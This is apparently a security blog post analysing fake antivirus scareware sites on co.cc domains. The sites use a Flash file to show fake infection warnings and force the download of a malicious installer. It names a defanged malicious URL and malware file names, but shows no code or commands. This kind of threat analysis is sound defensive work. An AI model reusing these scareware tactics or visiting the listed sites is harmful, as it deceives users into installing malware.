Fake AV sites using Flash for social engineering

We have seen many fake AV sites using images and cascading style sheets (CSS files) to display fake security messages. These pages are designed to trick users into believing that their machines are already infected and that they must download a ‘fix’. Recently, we are seeing many “co.cc” domains hosting fake AV sites that are instead using Adobe Flash for displaying the fake security messages. They all are using same source code and Flash files to create the animation effects of the messages. Once you visit these sites, you will be presented with a fake error message declaring something like “Your PC is infected” and you are then encouraged to download what turns out to be a malicious binary. Sadly, there is poor detection by AV vendors as we can see from the Virustotal results. Let’s take an example of one of the live fake AV sites, “hxxp:// scanace.co.cc”. Here is the what a potential victim will see at the site:

Even clicking on the “Cancel” button, a user will be forced to download the malicious binary which is followed by additional fake security messages.
Here is the source code from the main page:

If you look at the source code, you will see one Flash file named “flashH264decoder.swf”, which is being used for animation and an “installer.1.exe” binary which is downloaded to the system. A quick Google search for this malicious flash file reveals further domains hosting these fake AV pages. Below is the search result:

Since these sites are using the “flashH264decoder.swf” Flash file for animation, all the images and scripts are embedded inside this single malicious file. I have decompiled this malicious flash file to see what is inside. I found 13 image files, 26 shapes, 5 buttons and 10 scripts embedded inside the file. Here is the screenshot of this decompiled malicious flash file:

These domains are now blocked by Google SafeBrowsing,which is leveraged by both Firefox and Chrome browsers. Why did the attackers choose to use Flash instead of the images and CSS files that we traditionally see? While this approach requires a third party browser add-on, Flash is essentially ubiquitous with most browsers and perhaps the attackers felt that it allowed them to produce a more convincing social engineering attack.

Stay safe

Umesh